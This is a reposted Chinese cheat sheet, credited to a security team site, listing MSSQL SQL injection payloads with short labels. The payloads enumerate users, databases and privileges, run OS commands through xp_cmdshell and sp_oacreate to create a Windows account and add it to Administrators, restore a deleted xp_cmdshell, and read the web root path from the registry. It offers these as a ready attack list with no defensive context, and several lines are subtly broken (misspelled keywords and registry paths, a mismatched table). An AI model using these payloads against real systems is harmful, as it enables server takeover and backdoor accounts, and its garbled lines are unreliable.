[转载]SQL基本语言

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

&#39; and 0<>user_name()-- [查看用户]
&#39; and 0<>db_name()-- [查看库名]
&#39; and 1=(SELECT IS_SRVROLEMEMBER(&#39;sysadmin&#39;)) [判断是否是sysadmin权限]
&#39; and &#39;sa&#39;=(SELECT System_user)  [判断是否是SA用户]
&#39; and 0<>(select @@version)-- [查看系统版本]
  ;use model--[查看数据库角色]
&#39; and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)----[查看表名]

;declare @shell int exec sp_oacreate &#39;wscript.shell&#39;,@shell output exec sp_oamethod @shell,&#39;run&#39;,null,&#39;c:\winnt\system32\cmd.exe /c net user admin /add&#39;建立用户

;exec master..xp_cmdshell"net user admin /add"--添加用户
;exec master..xp_cmdshell"net localgroup administrators admin /add"--[提升用户]

and 1=(select IS_SRVROLEMEMBER(&#39;sysadmin&#39;)) 检测权限 sysadmin  

;exec master..xp_cmdshell &#39;dir c:\&#39;  XP_CMDSHELL检测

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = &#39;X&#39; AND name = &#39;xp_cmdshell&#39;) [xp_cmdshell是否被删除]

;EXEC master.dbo.sp_addextendedproc &#39;xp_cmdshell&#39;,&#39;xplog70.dll&#39; [恢复 XP_CMDSHELL]

;CRE-ATE TABLE newtable(id int IDENTITY(1,1),paths varhar(500)) Declare @test varchar(2) exec master..xp_regread @ rootkey=&#39;HKEY_LOCAL_MACHINE&#39;,@key=&#39;SYSTEM\CunentControlset\Services\W3SVC\Parameters\VirtualRoots\&#39;, @value_name=&#39;/&#39;, values=@test output insert into paths(path) values(@test)  [暴网站地址]